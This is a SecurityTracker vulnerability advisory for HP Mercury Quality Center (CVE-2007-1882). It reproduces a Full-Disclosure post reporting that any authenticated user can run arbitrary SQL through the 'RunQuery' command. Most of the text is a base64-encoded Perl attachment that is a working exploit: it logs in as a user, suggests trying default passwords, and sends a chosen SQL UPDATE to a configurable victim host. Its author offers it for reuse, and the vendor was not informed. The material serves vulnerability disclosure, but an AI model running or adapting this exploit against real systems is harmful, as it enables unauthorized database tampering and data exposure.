HP Mercury Quality Center Lets Remote Authenticated Users Execute SQL Commands
|
|
SecurityTracker Alert ID: 1017842 |
|
SecurityTracker URL: http://securitytracker.com/id/1017842
|
|
CVE Reference:
CVE-2007-1882
(Links to External Site)
|
Updated: May 16 2008
|
Original Entry Date: Apr 3 2007
|
Impact:
Disclosure of system information, Disclosure of user information, User access via network
|
Exploit Included: Yes
|
Version(s): 9.0 build 9.1.0.4352
|
Description:
A vulnerability was reported in HP Mercury Quality Center. A remote authenticated user can execute SQL commands.
A remote authenticated user can invoke the 'RunQuery' command to execute arbitrary SQL commands on the underlying database.
Isma Khan reported this vulnerability.
|
Impact:
A remote authenticated user can execute SQL commands on the underlying database.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.hp.com/ (Links to External Site)
|
Cause:
Access control error
|
Underlying OS: Linux (Any), UNIX (Solaris - SunOS), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Subject: [Full-disclosure] HP Mercury Quality Center Any SQL execution
|
------=_Part_1214_24346276.1175586285506
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Vendor: HP
Product: Mercury Quality Center
Version: 9.0 build 9.1.0.4352
Vendor Informed: No
HP Mercury Quality Center is test management product for companys to do
software testing and quality insurance.
HP Mercury Quality Center has additional guest command on server which
allows any user who logged on to run a SQL command of their choosing.
This command called 'RunQuery' not SQL injection but allows any SQL to
run. I hva eonly manage to get this to work as blind SQL command no
results returned but returning results probably possible with more
work.
Attached is small Perl script which likes to be the HPMQC client and
logs in as normal user and connects to a domain and project and runs
SQL. Last step in program that runs SQL will genarate error but will
works.
HPMQC can use MSDE, full MSSQLserver or Oracle data base.
------=_Part_1214_24346276.1175586285506
Content-Type: application/octet-stream; name=HP_MQC_Run_Any_Query.pl
Content-Transfer-Encoding: base64
X-Attachment-Id: f_f021mnv3
Content-Disposition: attachment; filename="HP_MQC_Run_Any_Query.pl"
IyEvdXNyL2Jpbi9wZXJsCiMqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioKIyBIUCBNZXJjdXJ5IFF1YWxpdHkgQ2VudGVyIHJ1
blF1ZXJ5IGV4cGxvaXQuCiMgUnVuIHdoYXRldmVyIFNRTCB5b3Ugd2FudCBvbiB0aGVyZSBkYiAt
IHdpdGhvdXQgU1FMIGluamVjdGlvbi4KIyBQcm9ibGVtIGlzIGNsaWVudCBjYW4gZG8gIlJ1blF1
ZXJ5IiBjb21tYW5kIG9zIHdlIHdyaXRlIHByb2dyYW0KIyB0byBkbyB0aGlzLiBDbGllbnQgY2Fu
IGxvdHMgb3RoZXIgdGhpbmdzIGl0IHNob3VsZCBub3QgYWxzbyEKIyBUaGUgYmFja2VuZCBkYXRh
YmFzZSBjYW4gYmUgTVNTUUxTZXJ2ZXIgb3IgT3JhY2xlIG9yIG5lYXJseSBvZnRlbgojIE1TREUu
IFRoaXMgY2hhbmdlcyBTUUwgdHlwZXMgeW91IGNhbiBzZW5kLiBUaGlzIGlzIGEgYmxpbmQgU1FM
CiMgYXR0YWNrIGJ1dCBtYXkgYmUgaXMgaXQgcG9zc2libGUgdG8gZ2V0IGRhdGEgb3V0IHNvbWVo
b3c/CiMKIyBDb3B5cmlnaHQgMjAwNyBJc21hIEtoYW4gLSBDb2RlIG1heSBiZSBmcmVlZGx5IHVz
dWFibGUgb24gb3RoZXIKIyBleHBsb2l0cyBhcyBsb25nIGFzIG5hbWUgYXBwZWFycy4KIyAqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioKdXNlIElPOjpTb2NrZXQ7Cm15ICRzcWwgPSAiVVBEQVRFIFVTRVJTIFNFVCBVU19BRERS
RVNTPScwd25lZCcgV0hFUkUgVVNfVVNFUk5BTUU9J3BhdWxfcWMnIjsKCiNteSAkc3FsID0gIlVQ
REFURSBVU0VSUyBTRVQgVVNfQUREUkVTUz0nMHduZWQnIFdIRVJFIFVTX1VTRVJOQU1FPSdpc21h
LWtoYW4nIjsKIyB2aWN0aW0gLSBQdXQgeXVyIHZpY3RpbXMgaG9zdG5hbWUgaGVyZS4KIyB2aWNw
b3J0IC0gUG9ydCB0byBjb25uZWN0IG9uLgojIHUgLSB1c2VybmFtZSB0byBsb2dpbiB0byBxdWFs
aXR5IGNlbnRlci4gVGhpcyB1c2VyIHByb3ZpZGVkLgojIHAgLSBQc3N3cmQgdG8gbG9naW4gb3Qg
cXVhbGl0eSBjZW50ZXIuIFRyeSBkZWZhdWx0IHBhc3N3b3Jkcy4KIyBkb21haW4gLSBBIGRvbWFp
biB0aGhhdCB1c2VyIGhhcyBhY2Nlc3MgdG8uCiMgcHJvamVjdCAtIEEgcHJvaiB0aGF0IHVzZXIg
aGFzIGFjY2VzcyB0by4KbXkgJHZpY3RpbSA9ICcxOTIuMTY4LjAuMic7IApteSAkdmljcG9ydCA9
IDgwODA7IApteSAkdSA9ICdhbGV4X3FjJzsgCm15ICRwPSAnJzsgCm15ICRkb21haW4gPSAnREVG
QVVMVCc7Cm15ICRwcm9qZWN0ID0gJ1F1YWxpdHlDZW50ZXJfRGVtbyc7CgojICoqKioqKiBMb2dp
biB0byBIUFFNQyAqKioqKioqKioqKioqKioqKioqCnByaW50ICJMb2dpblxuIjsKbXkgQGJpdHM7
CnB1c2ggQGJpdHMsIEFkZFN0cmluZygnTG9naW4nKTsKcHVzaCBAYml0cywgIlwiMDppbnQ6MVwi
IjsKcHVzaCBAYml0cywgIlwiMDppbnQ6LTFcIiI7CnB1c2ggQGJpdHMsICJcIjA6aW50Oi0xXCIi
OwpwdXNoIEBiaXRzLCBBZGRTdHJpbmcoIntcclxuVVNFUl9OQU1FOiR1LFxyXG5QQVNTV09SRDoi
IC4gU21vbGthRW5jcmlwdCgkcCkgLiAiLFxyXG5DTElFTlRUWVBFOlxcMDAwMDAwMThcXFF1YWxp
dHkgQ2VudGVyIENsaWVudCBVSVxyXG59XHJcbiIpOwpteSAkdG1waG9zdD0iMDpjb25zdHN0cjpC
YW5udSI7CnB1c2ggQGJpdHMsICJcXCIgLiBNYWtlSGV4KCR0bXBob3N0KSAuICJcXCIgLiAkdG1w
aG9zdDsKcHVzaCBAYml0cywgIlwiNjU1MzY6c3RyOjBcIiI7CnB1c2ggQGJpdHMsICJcIjA6cGlu
dDowXCIiOwpwdXNoIEBiaXRzLCAiXCIwOnBpbnQ6MFwiIjsKcHVzaCBAYml0cywgIlwiMDpwaW50
OjBcIiI7CgpteSAkcmVzPUhUVFBTZW5kaW5nKEBiaXRzKTsKdW5kZWYgQGJpdHM7Cm15ICgkc2Vz
aWQpID0gJHJlcyA9fiAvSUQ6KFxkKykvOwpkaWUgIk5vdCBsb2dpblxuIiB1bmxlc3MoJHNlc2lk
KTsKcHJpbnQgIlNlc3Npb24gSUQ6ICRzZXNpZFxuIjsKCiMgKioqKiogQ29ubmVjdCB0byBwcm9q
ZWN0ICoqKioqKioqKgpwcmludCAiQ29ubmVjdCB0byBwcm9qZWN0XG4iOwpwdXNoIEBiaXRzLCBB
ZGRTdHJpbmcoJ0Nvbm5lY3RQcm9qZWN0Jyk7CnB1c2ggQGJpdHMsICJcIjA6aW50OjJcIiI7CnB1
c2ggQGJpdHMsICJcIjA6aW50OiRzZXNpZFwiIjsKcHVzaCBAYml0cywgIlwiMDppbnQ6LTFcIiI7
CnB1c2ggQGJpdHMsIEFkZFN0cmluZygie1xyXG5ET01BSU5fTkFNRTokZG9tYWluLFxyXG5QUk9K
RUNUX05BTUU6XFwiIC4gTWFrZUhleCgkcHJvamVjdCkgLiAiXFwkcHJvamVjdFxyXG59XHJcbiIp
OwpwdXNoIEBiaXRzLCAiXCI2NTUzNjpzdHI6MFwiIjsKcHVzaCBAYml0cywgIlwiMDpwaW50OjBc
IiI7CiRyZXMgPSBIVFRQU2VuZGluZyhAYml0cyk7CnVuZGVmIEBiaXRzOwpteSAoJHBzZXNpZCkg
PSAkcmVzID1+IC9JRDooXGQrKS87CmRpZSAiTm90IHByb2plY3RcbiIgdW5sZXNzKCRwc2VzaWQp
OwpwcmludCAiUHJvamVjdCBTZXNzaW9uIElEOiAkcHNlc2lkXG4iOwoKIyAqKioqKioqKiBSdW4g
dGhlIFNRTCAqKioqKgpwcmludCAiUnVuIFNRTFxuIjsKcHVzaCBAYml0cywgQWRkU3RyaW5nKCdS
dW5RdWVyeScpOwpwdXNoIEBiaXRzLCAiXCIwOmludDozXCIiOwpwdXNoIEBiaXRzLCAiXCIwOmlu
dDokc2VzaWRcIiI7CnB1c2ggQGJpdHMsICJcIjA6aW50OiRwc2VzaWRcIiI7CnB1c2ggQGJpdHMs
IEFkZFN0cmluZygkc3FsKTsKcHVzaCBAYml0cywgIlwiNjU1MzY6c3RyOjBcIiI7CnB1c2ggQGJp
dHMsICJcIjA6aW50OjBcIiI7CiRyZXMgPSBIVFRQU2VuZGluZyhAYml0cyk7CnByaW50ICRyZXM7
CgojICoqKiogRXhwZWN0IHRvIGdldCBGYWlsZWQgdG8gUnVuIFF1ZXJ5W0VSUl9TRVBdTWVzc2Fn
ZXM6CiMgZXJyb3IgaGVyZSBidXQgU1FMIGxpa2UgSU5TRVJUIG9yIFVQREFURSBzdGlsbCB3b3Jr
LgoKIyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKgojIE1ha2UgcGFzc3dvcmQgCiMqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKc3ViIFNtb2xrYUVuY3Jp
cHQgewoJbXkgJHBhc3N3b3JkPXNoaWZ0OwoJcmV0dXJuICcnIHVubGVzcygkcGFzc3dvcmQpOwoJ
bXkgJGNyaXB0ZWQ9J0VOUkNSWVBURUQnOwoJbXkgJGJhc2UgPSAnU21vbGthV2FzSGVyZU1vblNo
ZXInOwoJbXkgJHg9MDsKCWZvcig7JHg8bGVuZ3RoKCRwYXNzd29yZCk7JHgrKyl7CgkJJGNyaXB0
ZWQgPSAkY3JpcHRlZCAuIChvcmQoc3Vic3RyKCRwYXNzd29yZCwkeCwxKSkrb3JkKHN1YnN0cigk
YmFzZSwkeCwxKSkpOwoJCSRjcmlwdGVkID0gJGNyaXB0ZWQgLiAnISc7Cgl9CglyZXR1cm4gJGNy
aXB0ZWQ7Cn0KCiMgKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqCiMgU2VuZCBhIHRleHQgYXMgSFRUUCB0byB2aWN0aW0uCiMgKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKc3Vi
IEhUVFBTZW5kaW5nIHsKCW15ICRib2R5ID0gYml0czJzdHJpbmcoQF8pOwoJbXkgJHNvY2sgPSBJ
Tzo6U29ja2V0OjpJTkVULT5uZXcocHJvdG89Pid0Y3AnLFBlZXJBZGRyPT4kdmljdGltLFBlZXJQ
b3J0PT4kdmljcG9ydCkKCQlvciBkaWUgIkNhbid0IGNvbm5lY3QuICQhXG4iOwoJbXkgJGhlYWRl
ciA9CSJQT1NUIC9xY2Jpbi9zZXJ2bGV0L3Rkc2VydmxldC9UREFQSV9HZW5lcmFsV2ViVHJlYXRt
ZW50IEhUVFAvMS4wXHJcbiIKLgkiQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9VVRG
LThcclxuIgouCSJYLVRELUlEOiAiIC4gc3ByaW50ZigiJTA4WCIsWFRESUQoJGJvZHkpKS4gIlxy
XG4iCi4gCSJVc2VyLUFnZW50OiBUZWFtU29mdCBXaW5JbmV0IENvbXBvbmVudFxyXG4iCi4JIkNv
bnRlbnQtTGVuZ3RoOiAiIC4gbGVuZ3RoKCRib2R5KSAuICJcclxuIgouCSJQcmFnbWE6IG5vLWNh
Y2hlXHJcbiIKLgkiXHJcbiI7CglwcmludCAkc29jayAkaGVhZGVyOwoJcHJpbnQgJHNvY2sgJGJv
ZHk7CglteSAkdGV4dDsKCXdoaWxlKCFlb2YoJHNvY2spKXsKCQkkdGV4dCAuPSA8JHNvY2s+OwoJ
fQoJcmV0dXJuICR0ZXh0Owp9CgojICoqKioqKioqKiBIUE1RQ3MgY29uc3RzdHIgdHlwZSAqKioq
KioqKioKc3ViIEFkZFN0cmluZyB7CglteSAkc3RyID0gc2hpZnQ7CglpZiAobGVuZ3RoKCRzdHIp
PDE2KXsKCQlyZXR1cm4gIlwiMDpjb25zdHN0cjokc3RyXCIiOwoJfSBlbHNlIHsKCQlyZXR1cm4g
J1xcJyAuIE1ha2VIZXgoIjA6Y29uc3RzdHI6JHN0ciIpIC4gIlxcMDpjb25zdHN0cjokc3RyIjsK
CX0KCn0KIyAqKioqKioqKkhQTVFDIHVzZXMgaGV4IGRpZ2l0cyBpbiBtYW55IHBsYWNlICoqKioq
KioqKioqKgpzdWIgTWFrZUhleCB7CglyZXR1cm4gc3ByaW50ZigiJTA4eCIsbGVuZ3RoKHNoaWZ0
KSk7Cn0KCiMgKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioKIyBUaGlzIHRha2VzIEBiaXRzIGFuZCBtYWtlIGJpZyBsb25nZXIgc3RyaW5nIG91
dCBvZiBpdC4KIyAqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqCnN1YiBiaXRzMnN0cmluZyB7CglteSBAYml0cz1AXzsKCW15ICRiaXRubyA9IDA7
CglteSAkcmV0c3RyPSJ7XHJcbiI7Cglmb3JlYWNoIG15ICRvbmViaXQgKEBiaXRzKXsKCQkkcmV0
c3RyIC49ICRiaXRubysrIC4gIjogJG9uZWJpdCxcclxuIjsKCX0KCSRyZXRzdHIgPSBzdWJzdHIo
JHJldHN0ciwwLC0zKTsKCSRyZXRzdHIgPSAkcmV0c3RyIC4gIlxyXG59XHJcbiI7CglyZXR1cm4g
JHJldHN0cjsKfQoKIyAqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqCiMgSFBNUUMgdXNlaWQgWC1URC1JRCBoZWFkZXIgd2hpY2ggaXMgc3VtIG9mIGFsbCBj
aGFycwojIGluIGJvZHkgcGx1cyBudW1iZXIgMjMwMS4gQ291bGQgY2hlY2tzdW0/CiMgKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKgpzdWIgWFRESUQgewoJbXkg
JHRvdGFsPTIzMDE7CglteSAkYm9keSA9IHNoaWZ0OwoKCWZvcihteSAkaT0wOyRpPGxlbmd0aCgk
Ym9keSk7JGkrKyl7CgkJJHRvdGFsICs9IG9yZChzdWJzdHIoJGJvZHksJGksMSkpOwoJfQoJcmV0
dXJuICR0b3RhbDsKfQo=
------=_Part_1214_24346276.1175586285506
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
------=_Part_1214_24346276.1175586285506--
|
|
